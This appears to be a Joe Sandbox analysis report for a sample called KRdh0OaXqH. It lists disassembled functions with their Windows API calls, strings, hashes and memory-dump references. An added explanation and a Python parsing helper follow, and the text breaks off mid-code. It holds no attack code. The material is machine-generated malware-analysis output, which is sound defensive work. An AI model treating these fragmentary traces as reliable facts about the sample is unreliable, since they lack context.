                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                            • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                            • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                            • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                                            Strings
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                                            • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                                            • PendingFileRenameOperations, xrefs: 00454F5C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                            • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                                            • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                            • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                                            • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                                            • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                            • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                                            • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                            • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                                            • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                            • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                                            • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                            • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421371
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                            • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                            • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                            • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                            • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                            • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                            • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                            APIs
                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                            • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                            • String ID:
                                                                                            • API String ID: 4071923889-0
                                                                                            • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                            • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                                            • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                            • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A14620A480A570EnumFonts
                                                                                            • String ID:
                                                                                            • API String ID: 2780753366-0
                                                                                            • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                            • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                            • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                            • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                            APIs
                                                                                              • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                                            Strings
                                                                                            • EndOffset range exceeded, xrefs: 0045BAED
                                                                                            • NumRecs range exceeded, xrefs: 0045BAB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                            • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                                            • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                            • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                              • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                              • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                              • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
                                                                                              • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                              • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                              • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                              • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                              • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                              • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                              • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                              • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                              • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                              • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                              • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                              • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                              • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                              • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                              • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 291738113-3839654196
                                                                                            • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                            • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                                            • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                            • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                            • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A15940CurrentThread
                                                                                            • String ID: RzE
                                                                                            • API String ID: 1959240892-1126107055
                                                                                            • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                            • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                            • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                            • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                            • API String ID: 3535843008-1113070880
                                                                                            • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                            • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                                            • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                            • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                            • String ID: CreateFile
                                                                                            • API String ID: 2528220319-823142352
                                                                                            • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                            • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                                            • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                            • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
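The "APIs" tables in the entries above (the initialisation routine that resolves SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy and the Wow64 file-system redirection functions through GetModuleHandleA/GetProcAddress, and the CreateFileA/CloseHandle routine whose call sits at 004741F1) list every call as `Name.MODULE(slot,slot,...), ref: address`. The slots are the sandbox's reconstruction of the stack at the call site: entries past the API's real parameter count are stale values rather than arguments, `?` marks an unknown slot, and flag words appear as raw hex. The Python below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample. It parses such lines, collects the names the code looks up at run time, and decodes the CreateFileA, SetErrorMode and SetProcessDEPPolicy constants. The embedded sample lines are copied from the entries above; the regex, the function names and the "a `.dll` string in the lpProcName slot is a stale slot" heuristic are the example's own assumptions.

```python
"""Added triage helper: parse the 'APIs' lines of a Joe Sandbox per-function
entry and decode the Win32 constants that matter to an analyst.
Not part of the report or of the analysed sample."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from this report's entries (one indirect
# resolver chain and two direct calls), verbatim apart from indentation.
SAMPLE_LINES = """\
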